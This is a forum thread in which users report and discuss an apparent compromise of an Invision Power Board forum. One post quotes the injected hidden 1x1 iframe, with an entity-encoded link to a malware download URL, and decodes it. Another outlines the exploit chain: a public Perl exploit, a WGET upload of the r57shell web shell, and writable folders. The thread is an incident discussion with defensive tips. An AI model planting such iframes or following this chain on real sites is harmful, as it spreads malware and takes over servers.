Have the forums been hacked?

By RaisinCain
in Site & Forum Issues

 Share

Recommended Posts

Grand Master

jamend

Posted
Posted
  Redmak said:

And is it just the forums or also the main page?

It's only the forums, not the main page. Anyways, the site should be taken offline until it's fixed, otherwise lots of people will be hacked. Also, and obviously, web pages don't just change themselves...

Rising Star

callumy

Posted
Posted

Lucky I am on my Mac! God this could be dangerous (I don't even have anti-virus for my non-internet connected laptop - I don't connect it to the internet so n most cases it doesn't matter). There isn't anything at http://zchxsikpgz.biz/. It is just the default Apache filler page! This is really bad. I hope it can be squashed soon.

Cal

Grand Master

Japlabot

Posted
Posted
  Quick Reply said: 

<iframe src=" 104; 116; 116; 112; 58; 47; 47; 122; 99; 104; 120; 115; 105; 107; 112; 103; 122; 46; 98; 105; 122; 47; 100; 108; 47; 97; 100; 118; 53; 52; 51; 46; 112; 104; 112;" width=1 height=1></iframe>

When the HTML entities are decoded (" ;"), it is http://zchxsikpgz.biz/dl/adv543.php

Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it.

  Redmak said:

Can anyone post a selection of the source because I don't see it

post-38039-1152350653_thumb.jpg

Collaborator

zipgenius

Posted
Posted

I can confirm: Invision Power Board has been hacked.

That happened also tmy forum at http://forum.wininizio.it

Useful notice for the admins: grep your server for the string "r57shell".

The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720

The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server.

post-4032-1152350664_thumb.jpg

Collaborator

zipgenius

Posted
Posted
  zipgenius said:
I can confirm: Invision Power Board has been hacked.

That happened also tmy forum at http://forum.wininizio.it

Useful notice for the admins: grep your server for the string "r57shell".

The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720

The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server.

Additional info: this kind of attack uses the Invision folders that need to be chmod 0777 like /uploads or similar.

This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.